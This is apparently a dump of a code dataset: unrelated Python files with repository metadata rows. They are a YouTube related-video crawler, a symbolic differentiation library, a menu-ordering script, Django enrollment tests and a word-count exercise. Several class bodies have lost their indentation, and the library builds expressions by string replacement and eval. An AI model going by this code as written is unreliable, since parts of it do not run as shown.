            related_id = []
            # Each entry id is a URL; the last path segment is the video id.
            for t in data['feed']['entry']:
                related_id.append(t['id']['$t'].split('/')[-1])
            return related_id
def get_vids():
    """Fetch up to 100 video ids still needing a related-ids crawl."""
    http = httplib2.Http()
    resp, content = http.request("{}/youtube/related_ids/?limit={}".format(SERVER_URL, 100))
    if resp.status != 200:
        return []
    return json.loads(content.decode("utf-8"))
def post_vids(vids):
    """Upload newly discovered video ids to the coordination server."""
    print("post vids, size = {}".format(len(vids)))
    payload = urllib.parse.urlencode({'ids': json.dumps(vids)})
    httplib2.Http().request("{}/youtube/ids/".format(SERVER_URL), "POST", payload)
def post_vids_fetched(vids):
    """Mark the given video ids as having had their related ids fetched."""
    print("post vids fetched, size = {}".format(len(vids)))
    payload = urllib.parse.urlencode({'ids': json.dumps(vids)})
    httplib2.Http().request("{}/youtube/related_ids/".format(SERVER_URL), "POST", payload)
if __name__ == '__main__':
    fetcher = YoutubeRelatedFetcher()
    # Pull batches of pending ids until the server has none left.
    while True:
        vids = get_vids()
        if len(vids) == 0:
            break
        related_ids = []
        for vid in vids:
            # Bug fix: `tmp` was previously undefined on a first-iteration
            # failure (NameError) and stale on later failures (duplicated
            # the previous video's results).
            tmp = None
            try:
                tmp = fetcher.get_related_id(vid)
            except:
                # Likely rate-limited: rebuild the fetcher and back off.
                print("sleep")
                fetcher = YoutubeRelatedFetcher()
                time.sleep(10)
            if tmp:
                related_ids.extend(tmp)
        post_vids(related_ids)
        post_vids_fetched(vids)
| true |
e409f8948e9874b11dcc9e0d0247f271d1e8e8dd | Python | drlabos/lflow | /LFlow/labos_flow_v2.py | UTF-8 | 22,625 | 2.890625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 14:42:42 2020
@author: sobol
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy.special import expit
"""
for variable names prefer using chars with integer index, e.g. x1, x2, u1
usage of chars or overlapping names (e.g. x and xx) may result in shit,
during replacement of variables with their values
"""
class LabFunc():
"""
for unary & binary pass one or more LabFunc
type basic:
function - callable string
derivatives=gradient - dictionary with partial derivatives
"""
def __init__(*fargs, derivatives=None, args=None, theta=1):
if (len(fargs)==3) and isinstance(fargs[1], str) and isinstance(fargs[2], dict):
"""
e.g.
LabFunc('3*x1', {'x1' : 1})
second argument will be treated as derivatives
"""
fargs[0].type = 'basic'
derivatives = derivatives or fargs[2]
if args:
fargs[0].args = set(args)
elif derivatives:
fargs[0].args = set(derivatives.keys())
else:
fargs[0].args = set()
fargs[0].fun = str(fargs[1])
elif len(fargs) > 2 and isinstance(fargs[1], LabFunc):
"""
e.g.
LabFunc(f1, f2, f3)
"""
fargs[0].type = 'multi'
fargs[0].args = fargs[1].args
for fun in fargs[2:]:
fargs[0].args = fargs[0].args.union(fun.args)
fargs[0].fun = list(fargs[1:])
elif len(fargs) == 2 and isinstance(fargs[1], LabFunc):
"""
e.g.
LabFunc(f1), -f1
"""
fargs[0].type = 'unary'
fargs[0].args = fargs[1].args
fargs[0].fun = fargs[1]
elif isinstance(fargs[1], str) or np.isscalar(fargs[1]):
"""
LabFunc('3*x1', derivatives={'x1' : 1}), LabFunc(5)
"""
fargs[0].type = 'basic'
if args:
fargs[0].args = set(args)
elif derivatives:
fargs[0].args = set(derivatives.keys())
else:
fargs[0].args = set()
fargs[0].fun = str(fargs[1])
else:
fargs[0].type = 'basic'
if fargs[0].type == 'basic':
if '_p_' not in fargs[0].fun:
for arg in fargs[0].args:
fargs[0].fun = fargs[0].fun.replace(arg, '_p_[\'{}\']'.format(arg))
fargs[0].derivatives = derivatives
for arg in fargs[0].derivatives:
if type(fargs[0].derivatives[arg]) != 'str':
fargs[0].derivatives[arg] = str(fargs[0].derivatives[arg])
if '_p_' not in fargs[0].derivatives[arg]:
for arg2 in fargs[0].args:
fargs[0].derivatives[arg] = fargs[0].derivatives[arg].replace(arg2, '_p_[\'{}\']'.format(arg2))
fargs[0].theta = theta
fargs[0].name = ''
def _process_command(self, cmd, x):
if isinstance(x, Point):
for key in x.dict:
cmd = cmd.replace(key, str(x[key]))
elif isinstance(x, dict):
for key in x:
cmd = cmd.replace(key, str(x[key]))
elif isinstance(x, pd.Series):
for key in x.keys():
cmd = cmd.replace(key, str(x[key]))
elif hasattr(x, '__iter__') and (len(self.args) == len(x)):
for i, arg in enumerate(self.args):
cmd = cmd.replace(arg, str(x[i]))
elif len(self.args) == 1:
cmd = cmd.replace(list(self.args)[0], str(x))
return cmd
def __str__(self):
if self.type == 'basic':
return '{}({})'.format(self.name, self.fun)
else:
return str(self.fun)
def __repr__(self):
return str(self)
def _process_arg(self, _p_):
    """Normalize the evaluation argument to a (mapping, batch_size) pair.

    Accepts a Point, a pandas Series, a dict of name -> scalar/array, or a
    raw scalar/iterable that is matched positionally against ``self.args``.
    """
    if isinstance(_p_, Point):
        return _p_, _p_._size
    if isinstance(_p_, pd.Series):
        return _p_, _p_.shape[0]
    if isinstance(_p_, dict):
        # Batch size is read off the first value (scalar -> 1).
        for value in _p_.values():
            batch = 1 if np.isscalar(value) else value.shape[0]
            break
        return _p_, batch
    # A bare vector/scalar was passed: try to match it to the argument
    # names.  This may behave unexpectedly but eases the simplest calls.
    raw = _p_
    _p_ = {}
    if (len(self.args) == 1) and np.isscalar(raw):
        _p_[list(self.args)[0]] = raw
    elif hasattr(raw, '__iter__') and (len(self.args) == len(raw)):
        for name, value in zip(self.args, raw):
            _p_[name] = value
    return _p_, 1
def __call__(self, _p_):
    """Evaluate the expression at *_p_*; only 'basic' nodes are evaluable here.

    Composite node types override this method; the base implementation
    raises NotImplementedError for them.
    """
    if self.type != 'basic':
        raise NotImplementedError
    # The compiled expression string references the mapping by the name
    # '_p_', so the parameter name must stay exactly '_p_'.
    _p_, size = self._process_arg(_p_)
    value = eval(self.fun)
    if np.isscalar(value) and size > 1:
        # Broadcast a constant result to the batch shape.
        return value * np.ones((size, 1))
    return value
def deriv(self, _p_, args=None):
    """Evaluate the stored derivative expressions at *_p_*.

    Returns a Point mapping each requested argument name to its
    derivative value; arguments with no stored derivative get zeros.
    """
    if self.type != 'basic':
        raise NotImplementedError
    # Derivative expression strings reference '_p_' by name.
    _p_, size = self._process_arg(_p_)
    wanted = args or self.derivatives.keys()
    grads = {}
    for name in wanted:
        if name not in self.derivatives:
            grads[name] = np.zeros((size, 1))
            continue
        cmd = self.derivatives[name]
        value = eval(cmd)
        if np.isscalar(value) and (size > 1):
            value = value * np.ones((size, 1))
        grads[name] = value
    return Point(grads)
def __neg__(self):
    """Unary minus: wrap this function in a negation node."""
    negated = LabNeg(self)
    return negated
def __add__(self, other):
    """Addition; flattens LabSum term lists instead of nesting them.

    Scalars are wrapped in Constant.  Unsupported operand types fall
    through and yield None, matching the original behavior.
    """
    if isinstance(self, LabSum):
        if isinstance(other, LabSum):
            terms = self.fun + other.fun
        elif isinstance(other, LabFunc):
            terms = self.fun + [other]
        elif np.isscalar(other):
            terms = self.fun + [Constant(other)]
        else:
            return None  # mirrors the original fall-through
        return LabSum(*terms)
    if isinstance(other, LabSum):
        return LabSum(*([self] + other.fun))
    if np.isscalar(other):
        return LabSum(self, Constant(other))
    return LabSum(self, other)
def __radd__(self, other):
    """Right-hand addition delegates to __add__ (addition is symmetric here)."""
    return self.__add__(other)
def __sub__(self, other):
    """Subtraction; scalar subtrahends are wrapped in Constant first."""
    if np.isscalar(other):
        other = Constant(other)
    if isinstance(other, LabFunc):
        return LabSubtract(self, other)
def __rsub__(self, other):
    """other - f is rewritten as other + (-f)."""
    return other + (-self)
def __mul__(self, other):
    """Multiplication; flattens LabProd factor lists instead of nesting.

    Scalars are wrapped in Constant.  Unsupported operand types fall
    through and yield None, matching the original behavior.
    """
    if isinstance(self, LabProd):
        if isinstance(other, LabProd):
            factors = self.fun + other.fun
        elif isinstance(other, LabFunc):
            factors = self.fun + [other]
        elif np.isscalar(other):
            factors = self.fun + [Constant(other)]
        else:
            return None  # mirrors the original fall-through
        return LabProd(*factors)
    if isinstance(other, LabProd):
        return LabProd(*([self] + other.fun))
    if np.isscalar(other):
        return LabProd(self, Constant(other))
    return LabProd(self, other)
def __rmul__(self, other):
    """Right-hand multiplication delegates to __mul__ (commutative here)."""
    return self.__mul__(other)
def __truediv__(self, other):
    """Division; scalar divisors are wrapped in Constant first."""
    if np.isscalar(other):
        other = Constant(other)
    if isinstance(other, LabFunc):
        return LabDivide(self, other)
def __rtruediv__(self, other):
    """scalar / f -> LabDivide(Constant(scalar), f); anything else yields None."""
    if not np.isscalar(other):
        return None  # mirrors the original fall-through
    return LabDivide(Constant(other), self)
def __pow__(self, other):
    """Exponentiation; scalar exponents are wrapped in Constant."""
    exponent = Constant(other) if np.isscalar(other) else other
    return LabPower(self, exponent)
def __rpow__(self, other):
    """scalar ** f -> LabPower(Constant(scalar), f); anything else is unsupported."""
    if not np.isscalar(other):
        raise NotImplementedError
    return LabPower(Constant(other), self)
class Identity(LabFunc):
    """The identity function f(arg) = arg; used to model free variables."""

    def __init__(self, arg):
        # d(arg)/d(arg) == 1
        derivs = {arg: 1}
        super().__init__(arg, derivatives=derivs)
class Constant(LabFunc):
    """A constant value: no arguments and no derivatives."""

    def __init__(self, val):
        super().__init__(str(val), derivatives={}, args=[])
class LabNeg(LabFunc):
    """Negation node: represents -f."""

    def __call__(self, p):
        inner_value = self.fun(p)
        return -inner_value

    def deriv(self, p, args=None):
        # (-f)' = -f'
        inner_grad = self.fun.deriv(p, args=args)
        return -inner_grad

    def __str__(self):
        return f'-{self.fun}'

    def __repr__(self):
        return self.__str__()
class LabSum(LabFunc):
    """Sum node: the pointwise sum of several term functions."""

    def __call__(self, p):
        p, size = self._process_arg(p)
        if size == 1:
            return np.sum([term(p) for term in self.fun])
        # Batched: stack each term as a (size, 1) column, sum across columns.
        columns = [term(p).reshape((size, 1)) for term in self.fun]
        return np.sum(np.concatenate(columns, axis=1), axis=1, keepdims=True)

    def deriv(self, p, args=None):
        # The derivative of a sum is the sum of the derivatives.
        total = self.fun[0].deriv(p, args=args)
        for term in self.fun[1:]:
            total += term.deriv(p, args=args)
        return total

    def __str__(self):
        return 'sum({})'.format(', '.join(str(term) for term in self.fun))

    def __repr__(self):
        return self.__str__()
class LabSubtract(LabFunc):
    """Difference node: represents f0 - f1."""

    def __call__(self, p):
        minuend, subtrahend = self.fun
        return minuend(p) - subtrahend(p)

    def deriv(self, p, args=None):
        # (f0 - f1)' = f0' - f1'
        minuend, subtrahend = self.fun
        return minuend.deriv(p, args=args) - subtrahend.deriv(p, args=args)

    def __str__(self):
        return f'{self.fun[0]} - {self.fun[1]}'

    def __repr__(self):
        return self.__str__()
class LabProd(LabFunc):
    """Product node: the pointwise product of several factor functions."""
    def __call__(self, p):
        # Evaluate every factor and multiply them together.
        p, size = self._process_arg(p)
        if size == 1:
            return np.prod([f(p) for f in self.fun])
        else:
            # Batched input: stack the factors as (size, 1) columns and
            # take the row-wise product, keeping the (size, 1) shape.
            vals = np.concatenate([f(p).reshape((size, 1)) for f in self.fun], axis=1)
            return np.prod(vals, axis=1, keepdims = True)
        #return np.prod([f(p) for f in self.fun], axis=0)
    def deriv(self, p, args=None):
        # Product rule: d/d(arg) prod_i f_i = sum_i [ f_i' * prod_{j != i} f_j ].
        # Implemented by taking the vector of factor values and, for each i,
        # replacing the i-th value with the i-th derivative before multiplying.
        p, size = self._process_arg(p)
        keys = args or self.args
        res = Point({arg : 0 for arg in keys})
        big_derivs = []
        for f in self.fun:
            # Full derivative Point of each factor (w.r.t. all of its args).
            big_derivs.append(f.deriv(p))
        if size==1:
            vals = np.array([f(p) for f in self.fun])
            for arg in keys:
                # Per-factor derivative w.r.t. this argument (0 if the
                # factor does not depend on it).
                arg_derivs = []
                for d in big_derivs:
                    if arg in d.dict:
                        arg_derivs.append(d[arg])
                    else:
                        arg_derivs.append(0)
                arg_derivs = np.array(arg_derivs)
                for i in range(len(self.fun)):
                    # Swap value_i -> derivative_i, multiply, accumulate.
                    tmp = vals.copy()
                    tmp[i] = arg_derivs[i]
                    res[arg] = res[arg] + np.prod(tmp)
        else:
            # Batched version of the same swap-and-multiply scheme, with
            # factors laid out as (size, n_factors) columns.
            vals = np.concatenate([f(p).reshape((size, 1)) for f in self.fun], axis=1)
            zero_col = np.zeros((size, 1))
            for arg in keys:
                arg_derivs = []
                for d in big_derivs:
                    if arg in d.dict:
                        arg_derivs.append(d[arg].reshape((size, 1)))
                    else:
                        arg_derivs.append(zero_col)
                arg_derivs = np.concatenate(arg_derivs, axis=1)
                for i in range(len(self.fun)):
                    tmp = vals.copy()
                    tmp[:, i] = arg_derivs[:,i]
                    res[arg] = res[arg] + np.prod(tmp, axis=1, keepdims=True)
        return res
    def __str__(self):
        return 'prod({})'.format(', '.join([str(f) for f in self.fun]))
    def __repr__(self):
        return str(self)
class LabDivide(LabFunc):
    """Quotient node: represents f0 / f1.

    Division by zero is not special-cased: numpy semantics apply
    (inf/nan plus a runtime warning).
    """

    def __call__(self, p):
        return np.divide(self.fun[0](p), self.fun[1](p))

    def deriv(self, p, args=None):
        """Quotient rule: (f/g)' = (f'*g - g'*f) / g**2.

        Fix: the original carried a zero-denominator fallback *after* this
        return statement; that code was unreachable (dead) and has been
        removed.  Behavior is unchanged.
        """
        return (self.fun[0].deriv(p, args=args)*self.fun[1](p) - self.fun[1].deriv(p, args=args)*self.fun[0](p))/(self.fun[1](p)**2)

    def __str__(self):
        return '{} / {}'.format(self.fun[0], self.fun[1])

    def __repr__(self):
        return str(self)
class LabPower(LabFunc):
    """Power node: represents base ** exponent (both LabFunc nodes)."""

    def __call__(self, p):
        base, exponent = self.fun[0], self.fun[1]
        return np.power(base(p), exponent(p))

    def deriv(self, p, args=None):
        base, exponent = self.fun[0], self.fun[1]
        base_const = isinstance(base, Constant)
        if base_const and isinstance(exponent, LabFunc):
            # c ** f  ->  f' * ln(c) * c**f
            return exponent.deriv(p, args=args) * np.log(base(p)) * self(p)
        elif (not base_const) and isinstance(exponent, Constant):
            # f ** c  ->  c * f' * f**(c - 1)
            return base.deriv(p, args=args) * exponent(p) * np.power(base(p), exponent(p) - 1)
        else:
            # General case: (f**g)' = (f'*g/f + g'*ln(f)) * f**g
            left = base.deriv(p, args=args) * exponent(p) / base(p)
            right = exponent.deriv(p, args=args) * np.log(base(p))
            return (left + right) * self(p)

    def __str__(self):
        return f'power({self.fun[0]}, {self.fun[1]})'

    def __repr__(self):
        return self.__str__()
class LabExp(LabFunc):
    """Exponential node: exp(f)."""

    def __call__(self, p):
        return np.exp(self.fun(p))

    def deriv(self, p, args=None):
        # (e**f)' = f' * e**f
        inner = self.fun(p)
        return self.fun.deriv(p, args=args) * np.exp(inner)

    def __str__(self):
        return f'exp({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabLog(LabFunc):
    """Natural-logarithm node: ln(f)."""

    def __call__(self, p):
        return np.log(self.fun(p))

    def deriv(self, p, args=None):
        # (ln f)' = f' / f
        inner = self.fun(p)
        return self.fun.deriv(p, args=args) / inner

    def __str__(self):
        return f'log({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabCos(LabFunc):
    """Cosine node: cos(f)."""

    def __call__(self, p):
        return np.cos(self.fun(p))

    def deriv(self, p, args=None):
        # (cos f)' = -f' * sin(f)
        grad = self.fun.deriv(p, args=args)
        return -grad * np.sin(self.fun(p))

    def __str__(self):
        return f'cos({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabSin(LabFunc):
    """Sine node: sin(f)."""

    def __call__(self, p):
        return np.sin(self.fun(p))

    def deriv(self, p, args=None):
        # (sin f)' = f' * cos(f)
        inner = self.fun(p)
        return self.fun.deriv(p, args=args) * np.cos(inner)

    def __str__(self):
        return f'sin({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabArctg(LabFunc):
    """Arctangent node: arctan(f)."""

    def __call__(self, p):
        return np.arctan(self.fun(p))

    def deriv(self, p, args=None):
        # (arctan f)' = f' / (1 + f**2)
        inner = self.fun(p)
        return self.fun.deriv(p, args=args) / (1 + np.power(inner, 2))

    def __str__(self):
        return f'arctg({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabSigmoid(LabFunc):
    """Logistic sigmoid of theta * f, computed with the numerically stable expit."""

    def __call__(self, p):
        return expit(self.theta * self.fun(p))

    def deriv(self, p, args=None):
        # s' = theta * f' * s * (1 - s), with s = sigmoid(theta * f)
        s = self(p)
        return self.theta * self.fun.deriv(p, args=args) * s * (1 - s)

    def __str__(self):
        return f'sigmoid({self.fun})'

    def __repr__(self):
        return self.__str__()
class LabIndicator(LabFunc):
    """Step node: 1 where f > 0 (and at f == 0, per heaviside's 2nd arg), else 0."""

    def __call__(self, p):
        return np.heaviside(self.fun(p), 1)

    def deriv(self, p, **kwargs):
        # The step is flat almost everywhere, so its derivative is taken as 0.
        return 0

    def __str__(self):
        return f'I({self.fun} > 0)'

    def __repr__(self):
        return self.__str__()
class LabMax(LabFunc):
    """Pointwise maximum over several functions (pass-through for a single one)."""

    def __call__(self, p):
        if not isinstance(self.fun, list):
            # Single wrapped function: nothing to compare.
            return self.fun(p)
        p, size = self._process_arg(p)
        values = [f(p) for f in self.fun]
        if size == 1:
            return max(values)
        # Batched: compare the functions column-wise, keep (size, 1) shape.
        return np.max(np.concatenate(values, axis=1), axis=1, keepdims=True)

    def __str__(self):
        return 'max({})'.format(', '.join(str(f) for f in self.fun))

    def __repr__(self):
        return self.__str__()
class LabMin(LabFunc):
    """Pointwise minimum over several functions (pass-through for a single one)."""

    def __call__(self, p):
        if not isinstance(self.fun, list):
            # Single wrapped function: nothing to compare.
            return self.fun(p)
        p, size = self._process_arg(p)
        values = [f(p) for f in self.fun]
        if size == 1:
            return min(values)
        # Batched: compare the functions column-wise, keep (size, 1) shape.
        return np.min(np.concatenate(values, axis=1), axis=1, keepdims=True)

    def __str__(self):
        return 'min({})'.format(', '.join(str(f) for f in self.fun))

    def __repr__(self):
        return self.__str__()
class LabSmoothmax(LabFunc):
    """
    use a little trick here
    I do not calc the derivative of smooth maximum
    I use smooth version of max derivative
    """
    # Smooth (Boltzmann) maximum:
    #   sum_i f_i * e^(theta*f_i) / sum_i e^(theta*f_i)
    # Larger self.theta pushes the result toward the hard maximum.
    # NOTE(review): np.exp(theta*f(p)) can overflow for large theta*f;
    # subtracting max_i f_i before exponentiating would be safer --
    # confirm the intended input range before relying on large theta.
    def __call__(self, p):
        p, size = self._process_arg(p)
        if size == 1:
            vals_exp = np.sum([np.exp(self.theta*f(p)) for f in self.fun])
            vals_fexp = np.sum([f(p)*np.exp(self.theta*f(p)) for f in self.fun])
            return vals_fexp/vals_exp
        else:
            # Batched: weights and weighted values laid out as columns.
            vals_exp = np.concatenate([np.exp(self.theta*f(p)) for f in self.fun], axis=1)
            vals_fexp = np.concatenate([f(p)*np.exp(self.theta*f(p)) for f in self.fun], axis=1)
            return np.sum(vals_fexp, axis=1, keepdims=True)/np.sum(vals_exp, axis=1, keepdims=True)
    def deriv(self, p, args=None):
        # Softmax-weighted average of the member derivatives (the smooth
        # analogue of "derivative of the winning branch of max").
        p, size = self._process_arg(p)
        res = {}
        if size==1:
            vals_exp = sum([np.exp(self.theta*f(p)) for f in self.fun])
            vals_fexp = self.fun[0].deriv(p, args=args)*np.exp(self.theta*self.fun[0](p))
            for f in self.fun[1:]:
                vals_fexp = vals_fexp + f.deriv(p, args=args)*np.exp(self.theta*f(p))
            return vals_fexp/vals_exp
        else:
            # Batched: accumulate the weighted derivatives per argument.
            keys = args or self.args
            vals_exp = np.sum(np.concatenate([np.exp(self.theta*f(p)) for f in self.fun], axis=1), axis=1, keepdims=True)
            for key in keys:
                vals_fexp = np.concatenate([f.deriv(p, args=[key])[key]*np.exp(self.theta*f(p)) for f in self.fun], axis=1)
                res[key] = np.sum(vals_fexp, axis=1, keepdims=True)/vals_exp
            return Point(res)
    def __str__(self):
        return 'Smoothmax({})'.format(', '.join([str(f) for f in self.fun]))
    def __repr__(self):
        return str(self)
class LabSmoothmin(LabFunc):
    """
    use a little trick here
    I do not calc the derivative of smooth maximum
    I use smooth version of max derivative
    """
    # Smooth (Boltzmann) minimum: same scheme as LabSmoothmax but with
    # negated weights:
    #   sum_i f_i * e^(-theta*f_i) / sum_i e^(-theta*f_i)
    # Larger self.theta pushes the result toward the hard minimum.
    # NOTE(review): np.exp(-theta*f(p)) can overflow for large theta*|f|;
    # shifting by min_i f_i before exponentiating would be safer -- confirm
    # the intended input range before relying on large theta.
    def __call__(self, p):
        p, size = self._process_arg(p)
        if size == 1:
            vals_exp = np.sum([np.exp(-self.theta*f(p)) for f in self.fun])
            vals_fexp = np.sum([f(p)*np.exp(-self.theta*f(p)) for f in self.fun])
            return vals_fexp/vals_exp
        else:
            # Batched: weights and weighted values laid out as columns.
            vals_exp = np.concatenate([np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
            vals_fexp = np.concatenate([f(p)*np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
            return np.sum(vals_fexp, axis=1, keepdims=True)/np.sum(vals_exp, axis=1, keepdims=True)
    def deriv(self, p, args=None):
        # Softmin-weighted average of the member derivatives (the smooth
        # analogue of "derivative of the winning branch of min").
        p, size = self._process_arg(p)
        res = {}
        if size==1:
            vals_exp = sum([np.exp(-self.theta*f(p)) for f in self.fun])
            vals_fexp = self.fun[0].deriv(p, args=args)*np.exp(-self.theta*self.fun[0](p))
            for f in self.fun[1:]:
                vals_fexp = vals_fexp + f.deriv(p, args=args)*np.exp(-self.theta*f(p))
            return vals_fexp/vals_exp
        else:
            # Batched: accumulate the weighted derivatives per argument.
            keys = args or self.args
            vals_exp = np.sum(np.concatenate([np.exp(-self.theta*f(p)) for f in self.fun], axis=1), axis=1, keepdims=True)
            for key in keys:
                vals_fexp = np.concatenate([f.deriv(p, args=[key])[key]*np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
                res[key] = np.sum(vals_fexp, axis=1, keepdims=True)/vals_exp
            return Point(res)
    def __str__(self):
        return 'Smoothmin({})'.format(', '.join([str(f) for f in self.fun]))
    def __repr__(self):
        return str(self)
if __name__ == '__main__':
    # Demo / smoke test: build a few symbolic functions and combinators.
    from labos_point import Point
    p1 = Point({'x1' : 1, 'x2' : 1})
    p2 = Point({'x1' : 2, 'x2' : 3})
    # Basic functions with hand-written derivative expressions.
    f1 = LabFunc('3*x1+2', derivatives={'x1' : '3'})
    f2 = LabFunc('np.sin(x1)', derivatives={'x1' : 'np.cos(x1)'})
    # Fix: d/dx2 of (x1**2 - 2*x1*x2) is -2*x1, not -2*x2.
    f3 = LabFunc('x1**2 - 2*x1*x2', derivatives={'x1': '2*x1 - 2*x2', 'x2' : '-2*x1'})
    # Composite nodes built from the basic ones.
    t2 = LabExp(f1)
    t3 = LabLog(t2)
    t4 = LabCos(f2+f3)
    t5 = LabSin(f1+f2)
    t6 = LabSigmoid(f1+f2-f3)
    smax = LabSmoothmax(f1, f2, theta=10)
    smin = LabSmoothmin(f1, f2, theta=10)
    xs = np.arange(-3, 3, 0.01)
    # NOTE(review): the objects above are constructed but not used here --
    # presumably plotting/inspection code followed or was removed; confirm.
    ###
500e4f3a64a36cec105b44160ca544a2ccfe8c7b | Python | koukoou/space_2 | /test_copy/test6.py | UTF-8 | 1,109 | 4.0625 | 4 | [] | no_license | class MenuItem:
def __init__(self, name, price):
    """Store the menu item's display name and unit price (yen)."""
    self.name, self.price = name, price
def info(self):
    """Return a display string like 'サンドイッチ: ¥500'."""
    return f'{self.name}: ¥{self.price}'
def get_total_price(self, count):
    """Total price for *count* items; 10% off for 3 or more, rounded to int."""
    total = self.price * count
    if count >= 3:
        # Bulk discount: 10% off when buying three or more.
        total *= 0.9
    return round(total)
# --- simple console ordering flow ---------------------------------------
menu_item1 = MenuItem('サンドイッチ', 500)
menu_item2 = MenuItem('チョコケーキ', 400)
menu_item3 = MenuItem('コーヒー', 300)
menu_item4 = MenuItem('オレンジジュース', 200)
menu_items = [menu_item1, menu_item2, menu_item3, menu_item4]

# Print a numbered menu; enumerate replaces the original manual index
# counter (idiom fix, identical output).
for index, item in enumerate(menu_items):
    print(str(index) + '. ' + item.info())

print('--------------------')

# Ask which item and how many; get_total_price applies the bulk discount.
order = int(input('メニューの番号を入力してください: '))
selected_menu = menu_items[order]
print('選択されたメニュー: ' + selected_menu.name)

count = int(input('個数を入力してください(3つ以上で1割引): '))
result = selected_menu.get_total_price(count)
print('合計は' + str(result) + '円です')
| true |
f586c928ff0373f3d260debcd33e9d3d27494d61 | Python | ravipol2542/.html | /register/regis/tests/test_model.py | UTF-8 | 1,317 | 2.640625 | 3 | [] | no_license | from django.test import TestCase
from ..models import Student,Course
# Create your tests here.
class CourseTestCase(TestCase):
def setUp(self):
#createStudent
s1 = Student.objects.create(sName="Jamie Vardy", sID="6110612998")
s2 = Student.objects.create(sName="Michael Owen",sID="6110613004")
s3 = Student.objects.create(sName="Oliver Kahn",sID="6110613104")
#createCourse
a1=Course.objects.create(cID="CN201",cName="DATA I",cYear="2020",cTerm=2,avaiable_seat=1, )
a2=Course.objects.create(cID="CN202",cName="DATA II",cYear="2020",cTerm=2,avaiable_seat=2,)
def test_enroll_Total(self):
a = Course.objects.get(cID="CN201")
s = Student.objects.get(sName="Jamie Vardy")
a.attendStd.add(s)
self.assertEqual(a.attendStd.count(),1)
def test_enroll_status(self):
a = Course.objects.get(cID="CN202")
s1 = Student.objects.get(sName="Jamie Vardy")
s2 = Student.objects.get(sName="Michael Owen")
a.attendStd.add(s1)
a.attendStd.add(s2)
a.status = a.seatCheck()
self.assertFalse(a.status)
def test_seat_left(self):
a = Course.objects.get(cID="CN201")
s1 = Student.objects.get(sName="Jamie Vardy")
a.attendStd.add(s1)
self.assertEqual(int(a.seatLeft()),0)
| true |
edc4509364f91f0fb8d5bf57ef0ffeab4e1ee35d | Python | Nmazil-Dev/PythonCrashCoursePractice | /More Exercises/10-10.py | UTF-8 | 154 | 3.234375 | 3 | [] | no_license | #common words
# Count how often the word 'the' appears in a text file.
filename = 'book.txt'
with open(filename) as f_obj:
    words = f_obj.read()
print(words)
# Fix: str.count('the') also matches substrings inside words such as
# 'then' or 'there'; split into words and strip surrounding punctuation
# so only the standalone word is counted.
print(sum(1 for word in words.lower().split() if word.strip('.,;:!?"\'') == 'the'))
| true |